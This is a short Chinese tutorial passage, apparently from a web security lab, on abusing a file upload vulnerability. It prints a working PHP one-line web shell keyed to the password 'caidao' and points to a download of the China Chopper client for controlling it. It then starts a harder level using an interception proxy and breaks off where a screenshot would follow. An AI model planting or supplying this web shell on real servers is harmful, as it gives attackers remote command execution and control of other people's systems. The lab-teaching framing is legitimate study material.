我们很多攻击都会集中在下面这个应用里面
我们利用文件上传漏洞来上传程序文件
无论你上传什么文件都可以
我们上传一段sheel脚本
<?php @eval($_POST['caidao']);?>caidao是密码
然后下载中国菜刀
https://github.com/raddyfiy/caidao-official-version
这里设置一下路径
然后这里就可以执行各种操作了~~~
通过这个我们就可以拿到web sheel了
下面我们提高难度
这时我们就不能直接上次文件了
那么我们应该怎么办呢?使用新软件(使用代理拦截软件)
给火狐浏览器设置一下代理
软件长下面这个样子
